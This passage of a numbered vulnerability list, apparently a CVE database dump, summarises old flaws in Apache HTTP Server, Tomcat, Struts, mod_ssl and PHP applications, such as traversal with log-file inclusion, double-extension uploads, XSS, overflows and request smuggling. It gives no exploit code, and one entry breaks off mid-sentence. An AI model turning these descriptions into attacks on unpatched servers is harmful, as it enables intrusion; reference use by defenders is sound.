10649| [CVE-2007-0450] Directory traversal vulnerability in Apache HTTP Server and Tomcat 5.x before 5.5.22 and 6.x before 6.0.10, when using certain proxy modules (mod_proxy, mod_rewrite, mod_jk), allows remote attackers to read arbitrary files via a .. (dot dot) sequence with combinations of (1) "/" (slash), (2) "\" (backslash), and (3) URL-encoded backslash (%5C) characters in the URL, which are valid separators in Tomcat but not in Apache.
10650| [CVE-2007-0419] The BEA WebLogic Server proxy plug-in before June 2006 for the Apache HTTP Server does not properly handle protocol errors, which allows remote attackers to cause a denial of service (server outage).
10651| [CVE-2007-0173] Directory traversal vulnerability in index.php in L2J Statistik Script 0.09 and earlier, when register_globals is enabled and magic_quotes is disabled, allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the page parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by index.php.
10652| [CVE-2007-0098] Directory traversal vulnerability in language.php in VerliAdmin 0.3 and earlier, when magic_quotes_gpc is disabled, allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the lang cookie, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by language.php.
10653| [CVE-2007-0086] ** DISPUTED ** The Apache HTTP Server, when accessed through a TCP connection with a large window size, allows remote attackers to cause a denial of service (network bandwidth consumption) via a Range header that specifies multiple copies of the same fragment. NOTE: the severity of this issue has been disputed by third parties, who state that the large window size required by the attack is not normally supported or configured by the server, or that a DDoS-style attack would accomplish the same goal.
10654| [CVE-2006-7217] Apache Derby before 10.2.1.6 does not determine schema privilege requirements during the DropSchemaNode bind phase, which allows remote authenticated users to execute arbitrary drop schema statements in SQL authorization mode.
10655| [CVE-2006-7216] Apache Derby before 10.2.1.6 does not determine privilege requirements for lock table statements at compilation time, and consequently does not enforce privilege requirements at execution time, which allows remote authenticated users to lock arbitrary tables.
10656| [CVE-2006-7197] The AJP connector in Apache Tomcat 5.5.15 uses an incorrect length for chunks, which can cause a buffer over-read in the ajp_process_callback in mod_jk, which allows remote attackers to read portions of sensitive memory.
10657| [CVE-2006-7196] Cross-site scripting (XSS) vulnerability in the calendar application example in Apache Tomcat 4.0.0 through 4.0.6, 4.1.0 through 4.1.31, 5.0.0 through 5.0.30, and 5.5.0 through 5.5.15 allows remote attackers to inject arbitrary web script or HTML via the time parameter to cal2.jsp and possibly unspecified other vectors. NOTE: this may be related to CVE-2006-0254.1.
10658| [CVE-2006-7195] Cross-site scripting (XSS) vulnerability in implicit-objects.jsp in Apache Tomcat 5.0.0 through 5.0.30 and 5.5.0 through 5.5.17 allows remote attackers to inject arbitrary web script or HTML via certain header values.
10659| [CVE-2006-7098] The Debian GNU/Linux 033_-F_NO_SETSID patch for the Apache HTTP Server 1.3.34-4 does not properly disassociate httpd from a controlling tty when httpd is started interactively, which allows local users to gain privileges to that tty via a CGI program that calls the TIOCSTI ioctl.
10660| [CVE-2006-6869] Directory traversal vulnerability in includes/search/search_mdforum.php in MAXdev MDForum 2.0.1 and earlier, when magic_quotes_gpc is disabled and register_globals is enabled, allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the PNSVlang cookie to error.php, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by error.php.
10661| [CVE-2006-6675] Cross-site scripting (XSS) vulnerability in Novell NetWare 6.5 Support Pack 5 and 6 and Novell Apache on NetWare 2.0.48 allows remote attackers to inject arbitrary web script or HTML via unspecifeid parameters in Welcome web-app.
10662| [CVE-2006-6613] Directory traversal vulnerability in language.php in phpAlbum 0.4.1 Beta 6 and earlier, when magic_quotes_gpc is disabled and register_globals is enabled, allows remote attackers to include and execute arbitrary local files or obtain sensitive information via a .. (dot dot) in the pa_lang[include_file] parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by language.php.
10663| [CVE-2006-6589] Cross-site scripting (XSS) vulnerability in ecommerce/control/keywordsearch in the Apache Open For Business Project (OFBiz) and Opentaps 0.9.3 allows remote attackers to inject arbitrary web script or HTML via the SEARCH_STRING parameter, a different issue than CVE-2006-6587. NOTE: some of these details are obtained from third party information.
10664| [CVE-2006-6588] The forum implementation in the ecommerce component in the Apache Open For Business Project (OFBiz) trusts the (1) dataResourceTypeId, (2) contentTypeId, and certain other hidden form fields, which allows remote attackers to create unauthorized types of content, modify content, or have other unknown impact.
10665| [CVE-2006-6587] Cross-site scripting (XSS) vulnerability in the forum implementation in the ecommerce component in the Apache Open For Business Project (OFBiz) allows remote attackers to inject arbitrary web script or HTML by posting a message.
10666| [CVE-2006-6445] Directory traversal vulnerability in error.php in Envolution 1.1.0 and earlier allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the PNSVlang (PNSV lang) parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by error.php.
10667| [CVE-2006-6071] TWiki 4.0.5 and earlier, when running under Apache 1.3 using ApacheLogin with sessions and "ErrorDocument 401" redirects to a valid wiki topic, does not properly handle failed login attempts, which allows remote attackers to read arbitrary content by cancelling out of a failed authentication with a valid username and invalid password.
10668| [CVE-2006-6047] Directory traversal vulnerability in manager/index.php in Etomite 0.6.1.2 allows remote authenticated administrators to include and execute arbitrary local files via a .. (dot dot) in the f parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by index.php.
10669| [CVE-2006-5894] Directory traversal vulnerability in lang.php in Rama CMS 0.68 and earlier, when register_globals is enabled, allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the lang cookie, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by lang.php.
10670| [CVE-2006-5752] Cross-site scripting (XSS) vulnerability in mod_status.c in the mod_status module in Apache HTTP Server (httpd), when ExtendedStatus is enabled and a public server-status page is used, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors involving charsets with browsers that perform "charset detection" when the content-type is not specified.
10671| [CVE-2006-5733] Directory traversal vulnerability in error.php in PostNuke 0.763 and earlier allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the PNSVlang (PNSV lang) cookie, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by error.php.
10672| [CVE-2006-5263] Directory traversal vulnerability in templates/header.php3 in phpMyAgenda 3.1 and earlier allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the language parameter, as demonstrated by a parameter value naming an Apache HTTP Server log file that apparently contains PHP code.
10673| [CVE-2006-4994] Multiple unquoted Windows search path vulnerabilities in Apache Friends XAMPP 1.5.2 might allow local users to gain privileges via a malicious program file in %SYSTEMDRIVE%, which is run when XAMPP attempts to execute (1) FileZillaServer.exe, (2) mysqld-nt.exe, (3) Perl.exe, or (4) xamppcontrol.exe with an unquoted "Program Files" pathname.
10674| [CVE-2006-4636] Directory traversal vulnerability in SZEWO PhpCommander 3.0 and earlier allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the Directory parameter, as demonstrated by parameter values naming Apache HTTP Server log files that apparently contain PHP code.
10675| [CVE-2006-4625] PHP 4.x up to 4.4.4 and PHP 5 up to 5.1.6 allows local users to bypass certain Apache HTTP Server httpd.conf options, such as safe_mode and open_basedir, via the ini_restore function, which resets the values to their php.ini (Master Value) defaults.
10676| [CVE-2006-4558] DeluxeBB 1.06 and earlier, when run on the Apache HTTP Server with the mod_mime module, allows remote attackers to execute arbitrary PHP code by uploading files with double extensions via the fileupload parameter in a newthread action in newpost.php.
10677| [CVE-2006-4191] Directory traversal vulnerability in memcp.php in XMB (Extreme Message Board) 1.9.6 and earlier allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the langfilenew parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by header.php.
10678| [CVE-2006-4154] Format string vulnerability in the mod_tcl module 1.0 for Apache 2.x allows context-dependent attackers to execute arbitrary code via format string specifiers that are not properly handled in a set_var function call in (1) tcl_cmds.c and (2) tcl_core.c.
10679| [CVE-2006-4110] Apache 2.2.2, when running on Windows, allows remote attackers to read source code of CGI programs via a request that contains uppercase (or alternate case) characters that bypass the case-sensitive ScriptAlias directive, but allow access to the file on case-insensitive file systems.
10680| [CVE-2006-4004] Directory traversal vulnerability in index.php in vbPortal 3.0.2 through 3.6.0 Beta 1, when magic_quotes_gpc is disabled, allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the bbvbplang cookie, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by index.php.
10681| [CVE-2006-3918] http_protocol.c in (1) IBM HTTP Server 6.0 before 6.0.2.13 and 6.1 before 6.1.0.1, and (2) Apache HTTP Server 1.3 before 1.3.35, 2.0 before 2.0.58, and 2.2 before 2.2.2, does not sanitize the Expect header from an HTTP request when it is reflected back in an error message, which might allow cross-site scripting (XSS) style attacks using web client components that can send arbitrary headers in requests, as demonstrated using a Flash SWF file.
10682| [CVE-2006-3835] Apache Tomcat 5 before 5.5.17 allows remote attackers to list directories via a semicolon (
10683| [CVE-2006-3747] Off-by-one error in the ldap scheme handling in the Rewrite module (mod_rewrite) in Apache 1.3 from 1.3.28, 2.0.46 and other versions before 2.0.59, and 2.2, when RewriteEngine is enabled, allows remote attackers to cause a denial of service (application crash) and possibly execute arbitrary code via crafted URLs that are not properly handled using certain rewrite rules.
10684| [CVE-2006-3362] Unrestricted file upload vulnerability in connectors/php/connector.php in FCKeditor mcpuk file manager, as used in (1) Geeklog 1.4.0 through 1.4.0sr3, (2) toendaCMS 1.0.0 Shizouka Stable and earlier, (3) WeBid 0.5.4, and possibly other products, when installed on Apache with mod_mime, allows remote attackers to upload and execute arbitrary PHP code via a filename with a .php extension and a trailing extension that is allowed, such as .zip.
10685| [CVE-2006-3102] Race condition in articles/BitArticle.php in Bitweaver 1.3, when run on Apache with the mod_mime extension, allows remote attackers to execute arbitrary PHP code by uploading arbitrary files with double extensions, which are stored for a small period of time under the webroot in the temp/articles directory.
10686| [CVE-2006-3070] write_ok.php in Zeroboard 4.1 pl8, when installed on Apache with mod_mime, allows remote attackers to bypass restrictions for uploading files with executable extensions by uploading a .htaccess file that with an AddType directive that assigns an executable module to files with assumed-safe extensions, as demonstrated by assigning the txt extension to be handled by application/x-httpd-php.
10687| [CVE-2006-2831] Drupal 4.6.x before 4.6.8 and 4.7.x before 4.7.2, when running under certain Apache configurations such as when FileInfo overrides are disabled within .htaccess, allows remote attackers to execute arbitrary code by uploading a file with multiple extensions, a variant of CVE-2006-2743.
10688| [CVE-2006-2806] The SMTP server in Apache Java Mail Enterprise Server (aka Apache James) 2.2.0 allows remote attackers to cause a denial of service (CPU consumption) via a long argument to the MAIL command.
10689| [CVE-2006-2743] Drupal 4.6.x before 4.6.7 and 4.7.0, when running on Apache with mod_mime, does not properly handle files with multiple extensions, which allows remote attackers to upload, modify, or execute arbitrary files in the files directory.
10690| [CVE-2006-2514] Coppermine galleries before 1.4.6, when running on Apache with mod_mime installed, allows remote attackers to upload arbitrary files via a filename with multiple file extensions.
10691| [CVE-2006-2330] PHP-Fusion 6.00.306 and earlier, running under Apache HTTP Server 1.3.27 and PHP 4.3.3, allows remote authenticated users to upload files of arbitrary types using a filename that contains two or more extensions that ends in an assumed-valid extension such as .gif, which bypasses the validation, as demonstrated by uploading then executing an avatar file that ends in ".php.gif" and contains PHP code in EXIF metadata.
10692| [CVE-2006-1777] Directory traversal vulnerability in doc/index.php in Jeremy Ashcraft Simplog 0.9.2 and earlier allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the s parameter, as demonstrated by injecting PHP sequences into an Apache error_log file, which is then included by doc/index.php.
10693| [CVE-2006-1564] Untrusted search path vulnerability in libapache2-svn 1.3.0-4 for Subversion in Debian GNU/Linux includes RPATH values under the /tmp/svn directory for the (1) mod_authz_svn.so and (2) mod_dav_svn.so modules, which might allow local users to gain privileges by installing malicious libraries in that directory.
10694| [CVE-2006-1548] Cross-site scripting (XSS) vulnerability in (1) LookupDispatchAction and possibly (2) DispatchAction and (3) ActionDispatcher in Apache Software Foundation (ASF) Struts before 1.2.9 allows remote attackers to inject arbitrary web script or HTML via the parameter name, which is not filtered in the resulting error message.
10695| [CVE-2006-1547] ActionForm in Apache Software Foundation (ASF) Struts before 1.2.9 with BeanUtils 1.7 allows remote attackers to cause a denial of service via a multipart/form-data encoded form with a parameter name that references the public getMultipartRequestHandler method, which provides further access to elements in the CommonsMultipartRequestHandler implementation and BeanUtils.
10696| [CVE-2006-1546] Apache Software Foundation (ASF) Struts before 1.2.9 allows remote attackers to bypass validation via a request with a 'org.apache.struts.taglib.html.Constants.CANCEL' parameter, which causes the action to be canceled but would not be detected from applications that do not use the isCancelled check.
10697| [CVE-2006-1393] Multiple cross-site scripting (XSS) vulnerabilities in the mod_pubcookie Apache application server module in University of Washington Pubcookie 1.x, 3.0.0, 3.1.0, 3.1.1, 3.2 before 3.2.1b, and 3.3 before 3.3.0a allow remote attackers to inject arbitrary web script or HTML via unspecified attack vectors.
10698| [CVE-2006-1346] Directory traversal vulnerability in inc/setLang.php in Greg Neustaetter gCards 1.45 and earlier allows remote attackers to include and execute arbitrary local files via directory traversal sequences in a lang[*][file] parameter, as demonstrated by injecting PHP sequences into an Apache access_log file, which is then included by index.php.
10699| [CVE-2006-1292] Directory traversal vulnerability in Jim Hu and Chad Little PHP iCalendar 2.21 and earlier allows remote attackers to include and execute arbitrary local files via directory traversal sequences and a NUL (%00) character in the phpicalendar[cookie_language] and phpicalendar[cookie_style] cookies, as demonstrated by injecting PHP sequences into an Apache access_log file, which is then included by day.php.
10700| [CVE-2006-1243] Directory traversal vulnerability in install05.php in Simple PHP Blog (SPB) 0.4.7.1 and earlier allows remote attackers to include and execute arbitrary local files via directory traversal sequences and a NUL (%00) character in the blog_language parameter, as demonstrated by injecting PHP sequences into an Apache access_log file, which is then included using install05.php.
10701| [CVE-2006-1095] Directory traversal vulnerability in the FileSession object in Mod_python module 3.2.7 for Apache allows local users to execute arbitrary code via a crafted session cookie.
10702| [CVE-2006-1079] htpasswd, as used in Acme thttpd 2.25b and possibly other products such as Apache, might allow local users to gain privileges via shell metacharacters in a command line argument, which is used in a call to the system function. NOTE: since htpasswd is normally installed as a non-setuid program, and the exploit is through command line options, perhaps this issue should not be included in CVE. However, if there are some typical or recommended configurations that use htpasswd with sudo privileges, or common products that access htpasswd remotely, then perhaps it should be included.
10703| [CVE-2006-1078] Multiple buffer overflows in htpasswd, as used in Acme thttpd 2.25b, and possibly other products such as Apache, might allow local users to gain privileges via (1) a long command line argument and (2) a long line in a file. NOTE: since htpasswd is normally installed as a non-setuid program, and the exploit is through command line options, perhaps this issue should not be included in CVE. However, if there are some typical or recommended configurations that use htpasswd with sudo privileges, or common products that access htpasswd remotely, then perhaps it should be included.
10704| [CVE-2006-0743] Format string vulnerability in LocalSyslogAppender in Apache log4net 1.2.9 might allow remote attackers to cause a denial of service (memory corruption and termination) via unknown vectors.
10705| [CVE-2006-0254] Multiple cross-site scripting (XSS) vulnerabilities in Apache Geronimo 1.0 allow remote attackers to inject arbitrary web script or HTML via the (1) time parameter to cal2.jsp and (2) any invalid parameter, which causes an XSS when the log file is viewed by the Web-Access-Log viewer.
10706| [CVE-2006-0150] Multiple format string vulnerabilities in the auth_ldap_log_reason function in Apache auth_ldap 1.6.0 and earlier allows remote attackers to execute arbitrary code via various vectors, including the username.
10707| [CVE-2006-0144] The proxy server feature in go-pear.php in PHP PEAR 0.2.2, as used in Apache2Triad, allows remote attackers to execute arbitrary PHP code by redirecting go-pear.php to a malicious proxy server that provides a modified version of Tar.php with a malicious extractModify function.
10708| [CVE-2006-0042] Unspecified vulnerability in (1) apreq_parse_headers and (2) apreq_parse_urlencoded functions in Apache2::Request (Libapreq2) before 2.07 allows remote attackers cause a denial of service (CPU consumption) via unknown attack vectors that result in quadratic computational complexity.
10709| [CVE-2005-4857] eZ publish 3.5 before 3.5.7, 3.6 before 3.6.5, 3.7 before 3.7.3, and 3.8 before 20051128 allows remote authenticated users to cause a denial of service (Apache httpd segmentation fault) via a request to content/advancedsearch.php with an empty SearchContentClassID parameter, reportedly related to a "memory addressing error".
10710| [CVE-2005-4849] Apache Derby before 10.1.2.1 exposes the (1) user and (2) password attributes in cleartext via (a) the RDBNAM parameter of the ACCSEC command and (b) the output of the DatabaseMetaData.getURL function, which allows context-dependent attackers to obtain sensitive information.
10711| [CVE-2005-4836] The HTTP/1.1 connector in Apache Tomcat 4.1.15 through 4.1.40 does not reject NULL bytes in a URL when allowLinking is configured, which allows remote attackers to read JSP source files and obtain sensitive information.
10712| [CVE-2005-4814] Unrestricted file upload vulnerability in Segue CMS before 1.3.6, when the Apache HTTP Server handles .phtml files with the PHP interpreter, allows remote attackers to upload and execute arbitrary PHP code by placing .phtml files in the userfiles/ directory.
10713| [CVE-2005-4703] Apache Tomcat 4.0.3, when running on Windows, allows remote attackers to obtain sensitive information via a request for a file that contains an MS-DOS device name such as lpt9, which leaks the pathname in an error message, as demonstrated by lpt9.xtp using Nikto.
10714| [CVE-2005-3745] Cross-site scripting (XSS) vulnerability in Apache Struts 1.2.7, and possibly other versions allows remote attackers to inject arbitrary web script or HTML via the query string, which is not properly quoted or filtered when the request handler generates an error message.
10715| [CVE-2005-3630] Fedora Directory Server before 10 allows remote attackers to obtain sensitive information, such as the password from adm.conf via an IFRAME element, probably involving an Apache httpd.conf configuration that orders "allow" directives before "deny" directives.
10716| [CVE-2005-3510] Apache Tomcat 5.5.0 to 5.5.11 allows remote attackers to cause a denial of service (CPU consumption) via a large number of simultaneous requests to list a web directory that has a large number of files.
10717| [CVE-2005-3392] Unspecified vulnerability in PHP before 4.4.1, when using the virtual function on Apache 2, allows remote attackers to bypass safe_mode and open_basedir directives.
10718| [CVE-2005-3357] mod_ssl in Apache 2.0 up to 2.0.55, when configured with an SSL vhost with access control and a custom error 400 error page, allows remote attackers to cause a denial of service (application crash) via a non-SSL request to an SSL port, which triggers a NULL pointer dereference.
10719| [CVE-2005-3352] Cross-site scripting (XSS) vulnerability in the mod_imap module of Apache httpd before 1.3.35-dev and Apache httpd 2.0.x before 2.0.56-dev allows remote attackers to inject arbitrary web script or HTML via the Referer when using image maps.
10720| [CVE-2005-3319] The apache2handler SAPI (sapi_apache2.c) in the Apache module (mod_php) for PHP 5.x before 5.1.0 final and 4.4 before 4.4.1 final allows attackers to cause a denial of service (segmentation fault) via the session.save_path option in a .htaccess file or VirtualHost.
10721| [CVE-2005-3164] The AJP connector in Apache Tomcat 4.0.1 through 4.0.6 and 4.1.0 through 4.1.36, as used in Hitachi Cosminexus Application Server and standalone, does not properly handle when a connection is broken before request body data is sent in a POST request, which can lead to an information leak when "unsuitable request body data" is used for a different request, possibly related to Java Servlet pages.
10722| [CVE-2005-2970] Memory leak in the worker MPM (worker.c) for Apache 2, in certain circumstances, allows remote attackers to cause a denial of service (memory consumption) via aborted connections, which prevents the memory for the transaction pool from being reused for other connections.
10723| [CVE-2005-2963] The mod_auth_shadow module 1.0 through 1.5 and 2.0 for Apache with AuthShadow enabled uses shadow authentication for all locations that use the require group directive, even when other authentication mechanisms are specified, which might allow remote authenticated users to bypass security restrictions.
10724| [CVE-2005-2728] The byte-range filter in Apache 2.0 before 2.0.54 allows remote attackers to cause a denial of service (memory consumption) via an HTTP header with a large Range field.
10725| [CVE-2005-2660] apachetop 0.12.5 and earlier, when running in debug mode, allows local users to create or append to arbitrary files via a symlink attack on atop.debug.
10726| [CVE-2005-2088] The Apache HTTP server before 1.3.34, and 2.0.x before 2.0.55, when acting as an HTTP proxy, allows remote attackers to poison the web cache, bypass web application firewall protection, and conduct XSS attacks via an HTTP request with both a "Transfer-Encoding: chunked" header and a Content-Length header, which causes Apache to incorrectly handle and forward the body of the request in a way that causes the receiving server to process it as a separate HTTP request, aka "HTTP Request Smuggling."
10727| [CVE-2005-1754] ** DISPUTED ** JavaMail API 1.1.3 through 1.3, as used by Apache Tomcat 5.0.16, allows remote attackers to read arbitrary files via a full pathname in the argument to the Download parameter. NOTE: Sun and Apache dispute this issue. Sun states: "The report makes references to source code and files that do not exist in the mentioned products."
10728| [CVE-2005-1753] ** DISPUTED ** ReadMessage.jsp in JavaMail API 1.1.3 through 1.3, as used by Apache Tomcat 5.0.16, allows remote attackers to view other users' e-mail attachments via a direct request to /mailboxesdir/username@domainname. NOTE: Sun and Apache dispute this issue. Sun states: "The report makes references to source code and files that do not exist in the mentioned products."
10729| [CVE-2005-1344] Buffer overflow in htdigest in Apache 2.0.52 may allow attackers to execute arbitrary code via a long realm argument. NOTE: since htdigest is normally only locally accessible and not setuid or setgid, there are few attack vectors which would lead to an escalation of privileges, unless htdigest is executed from a CGI program. Therefore this may not be a vulnerability.
10730| [CVE-2005-1268] Off-by-one error in the mod_ssl Certificate Revocation List (CRL) verification callback in Apache, when configured to use a CRL, allows remote attackers to cause a denial of service (child process crash) via a CRL that causes a buffer overflow of one null byte.
10731| [CVE-2005-1266] Apache SpamAssassin 3.0.1, 3.0.2, and 3.0.3 allows remote attackers to cause a denial of service (CPU consumption and slowdown) via a message with a long Content-Type header without any boundaries.
10732| [CVE-2005-0808] Apache Tomcat before 5.x allows remote attackers to cause a denial of service (application crash) via a crafted AJP12 packet to TCP port 8007.
10733| [CVE-2005-0182] The mod_dosevasive module 1.9 and earlier for Apache creates temporary files with predictable filenames, which could allow remote attackers to overwrite arbitrary files via a symlink attack.
10734| [CVE-2005-0108] Apache mod_auth_radius 1.5.4 and libpam-radius-auth allow remote malicious RADIUS servers to cause a denial of service (crash) via a RADIUS_REPLY_MESSAGE with a RADIUS attribute length of 1, which leads to a memcpy operation with a -1 length argument.
10735| [CVE-2004-2734] webadmin-apache.conf in Novell Web Manager of Novell NetWare 6.5 uses an uppercase Alias tag with an inconsistent lowercase directory tag for a volume, which allows remote attackers to bypass access control to the WEB-INF folder.
10736| [CVE-2004-2680] mod_python (libapache2-mod-python) 3.1.4 and earlier does not properly handle when output filters process more than 16384 bytes, which can cause filter.read to return portions of previously freed memory.
10737| [CVE-2004-2650] Spooler in Apache Foundation James 2.2.0 allows local users to cause a denial of service (memory consumption) by triggering various error conditions in the retrieve function, which prevents a lock from being released and causes a memory leak.
10738| [CVE-2004-2343] ** DISPUTED ** Apache HTTP Server 2.0.47 and earlier allows local users to bypass .htaccess file restrictions, as specified in httpd.conf with directives such as Deny From All, by using an ErrorDocument directive. NOTE: the vendor has disputed this issue, since the .htaccess mechanism is only intended to restrict external web access, and a local user already has the privileges to perform the same operations without using ErrorDocument.
10739| [CVE-2004-2336] Unknown vulnerability in Novell GroupWise and GroupWise WebAccess 6.0 through 6.5, when running with Apache Web Server 1.3 for NetWare where Apache is loaded using GWAPACHE.CONF, allows remote attackers to read directories and files on the server.
10740| [CVE-2004-2115] Multiple cross-site scripting (XSS) vulnerabilities in Oracle HTTP Server 1.3.22, based on Apache, allow remote attackers to execute arbitrary script as other users via the (1) action, (2) username, or (3) password parameters in an isqlplus request.
10741| [CVE-2004-1834] mod_disk_cache in Apache 2.0 through 2.0.49 stores client headers, including authentication information, on the hard disk, which could allow local users to gain sensitive information.
10742| [CVE-2004-1765] Off-by-one buffer overflow in ModSecurity (mod_security) 1.7.4 for Apache 2.x, when SecFilterScanPost is enabled, allows remote attackers to execute arbitrary code via crafted POST requests.
10743| [CVE-2004-1545] UploadFile.php in MoniWiki 1.0.9.2 and earlier, when used with Apache mod_mime, does not properly handle files with two file extensions, such as .php.hwp, which allows remote attackers to upload and execute arbitrary code.
10744| [CVE-2004-1438] The mod_authz_svn Apache module for Subversion 1.0.4-r1 and earlier allows remote authenticated users, with write access to the repository, to read unauthorized parts of the repository via the svn copy command.
10745| [CVE-2004-1405] MediaWiki 1.3.8 and earlier, when used with Apache mod_mime, does not properly handle files with two file extensions, such as .php.rar, which allows remote attackers to upload and execute arbitrary code.
10746| [CVE-2004-1404] Attachment Mod 2.3.10 module for phpBB, when used with Apache mod_mime, does not properly handle files with multiple file extensions, such as .php.rar, which allows remote attackers to upload and execute arbitrary code.
10747| [CVE-2004-1387] The check_forensic script in apache-utils package 1.3.31 allows local users to overwrite or create arbitrary files via a symlink attack on temporary files.
10748| [CVE-2004-1084] Apache for Apple Mac OS X 10.2.8 and 10.3.6 allows remote attackers to read files and resource fork content via HTTP requests to certain special file names related to multiple data streams in HFS+, which bypass Apache file handles.
10749| [CVE-2004-1083] Apache for Apple Mac OS X 10.2.8 and 10.3.6 restricts access to files in a case sensitive manner, but the Apple HFS+ filesystem accesses files in a case insensitive manner, which allows remote attackers to read .DS_Store files and files beginning with ".ht" using alternate capitalization.
10750| [CVE-2004-1082] mod_digest_apple for Apache 1.3.31 and 1.3.32 on Mac OS X Server does not properly verify the nonce of a client response, which allows remote attackers to replay credentials.
10751| [CVE-2004-0942] Apache webserver 2.0.52 and earlier allows remote attackers to cause a denial of service (CPU consumption) via an HTTP GET request with a MIME header containing multiple lines with a large number of space characters.
10752| [CVE-2004-0940] Buffer overflow in the get_tag function in mod_include for Apache 1.3.x to 1.3.32 allows local users who can create SSI documents to execute arbitrary code as the apache user via SSI (XSSI) documents that trigger a length calculation error.
10753| [CVE-2004-0885] The mod_ssl module in Apache 2.0.35 through 2.0.52, when using the "SSLCipherSuite" directive in directory or location context, allows remote clients to bypass intended restrictions by using any cipher suite that is allowed by the virtual host configuration.
10754| [CVE-2004-0811] Unknown vulnerability in Apache 2.0.51 prevents "the merging of the Satisfy directive," which could allow attackers to obtain access to restricted resources contrary to the specified authentication configuration.
10755| [CVE-2004-0809] The mod_dav module in Apache 2.0.50 and earlier allows remote attackers to cause a denial of service (child process crash) via a certain sequence of LOCK requests for a location that allows WebDAV authoring access.
10756| [CVE-2004-0786] The IPv6 URI parsing routines in the apr-util library for Apache 2.0.50 and earlier allow remote attackers to cause a denial of service (child process crash) via a certain URI, as demonstrated using the Codenomicon HTTP Test Tool.
10757| [CVE-2004-0751] The char_buffer_read function in the mod_ssl module for Apache 2.x, when using reverse proxying to an SSL server, allows remote attackers to cause a denial of service (segmentation fault).
10758| [CVE-2004-0748] mod_ssl in Apache 2.0.50 and earlier allows remote attackers to cause a denial of service (CPU consumption) by aborting an SSL connection in a way that causes an Apache child process to enter an infinite loop.
10759| [CVE-2004-0747] Buffer overflow in Apache 2.0.50 and earlier allows local users to gain apache privileges via a .htaccess file that causes the overflow during expansion of environment variables.
10760| [CVE-2004-0700] Format string vulnerability in the mod_proxy hook functions function in ssl_engine_log.c in mod_ssl before 2.8.19 for Apache before 1.3.31 may allow remote attackers to execute arbitrary messages via format string specifiers in certain log messages for HTTPS that are handled by the ssl_log function.
10761| [CVE-2004-0646] Buffer overflow in the WriteToLog function for JRun 3.0 through 4.0 web server connectors, such as (1) mod_jrun and (2) mod_jrun20 for Apache, with verbose logging enabled, allows remote attackers to execute arbitrary code via a long HTTP header Content-Type field or other fields.
10762| [CVE-2004-0529] The modified suexec program in cPanel, when configured for mod_php and compiled for Apache 1.3.31 and earlier without mod_phpsuexec, allows local users to execute untrusted shared scripts and gain privileges, as demonstrated using untainted scripts such as (1) proftpdvhosts or (2) addalink.cgi, a different vulnerability than CVE-2004-0490.
10763| [CVE-2004-0493] The ap_get_mime_headers_core function in Apache httpd 2.0.49 allows remote attackers to cause a denial of service (memory exhaustion), and possibly an integer signedness error leading to a heap-based buffer overflow on 64 bit systems, via long header lines with large numbers of space or tab characters.
10764| [CVE-2004-0492] Heap-based buffer overflow in proxy_util.c for mod_proxy in Apache 1.3.25 to 1.3.31 allows remote attackers to cause a denial of service (process crash) and possibly execute arbitrary code via a negative Content-Length HTTP header field, which causes a large amount of data to be copied.
10765| [CVE-2004-0490] cPanel, when compiling Apache 1.3.29 and PHP with the mod_phpsuexec option, does not set the --enable-discard-path option, which causes php to use the SCRIPT_FILENAME variable to find and execute a script instead of the PATH_TRANSLATED variable, which allows local users to execute arbitrary PHP code as other users via a URL that references the attacker's script after the user's script, which executes the attacker's script with the user's privileges, a different vulnerability than CVE-2004-0529.
10766| [CVE-2004-0488] Stack-based buffer overflow in the ssl_util_uuencode_binary function in ssl_util.c for Apache mod_ssl, when mod_ssl is configured to trust the issuing CA, may allow remote attackers to execute arbitrary code via a client certificate with a long subject DN.
10767| [CVE-2004-0263] PHP 4.3.4 and earlier in Apache 1.x and 2.x (mod_php) can leak global variables between virtual hosts that are handled by the same Apache child process but have different settings, which could allow remote attackers to obtain sensitive information.
10768| [CVE-2004-0174] Apache 1.4.x before 1.3.30, and 2.0.x before 2.0.49, when using multiple listening sockets on certain platforms, allows remote attackers to cause a denial of service (blocked new connections) via a "short-lived connection on a rarely-accessed listening socket."
10769| [CVE-2004-0173] Directory traversal vulnerability in Apache 1.3.29 and earlier, and Apache 2.0.48 and earlier, when running on Cygwin, allows remote attackers to read arbitrary files via a URL containing "..%5C" (dot dot encoded backslash) sequences.
10770| [CVE-2004-0113] Memory leak in ssl_engine_io.c for mod_ssl in Apache 2 before 2.0.49 allows remote attackers to cause a denial of service (memory consumption) via plain HTTP requests to the SSL port of an SSL-enabled server.
10771| [CVE-2004-0009] Apache-SSL 1.3.28+1.52 and earlier, with SSLVerifyClient set to 1 or 3 and SSLFakeBasicAuth enabled, allows remote attackers to forge a client certificate by using basic authentication with the "one-line DN" of the target user.
10772| [CVE-2003-1581] The Apache HTTP Server 2.0.44, when DNS resolution is enabled for client IP addresses, allows remote attackers to inject arbitrary text into log files via an HTTP request in conjunction with a crafted DNS response, as demonstrated by injecting XSS sequences, related to an "Inverse Lookup Log Corruption (ILLC)" issue.
10773| [CVE-2003-1580] The Apache HTTP Server 2.0.44, when DNS resolution is enabled for client IP addresses, uses a logging format that does not identify whether a dotted quad represents an unresolved IP address, which allows remote attackers to spoof IP addresses via crafted DNS responses containing numerical top-level domains, as demonstrated by a forged 123.123.123.123 domain name, related to an "Inverse Lookup Log Corruption (ILLC)" issue.
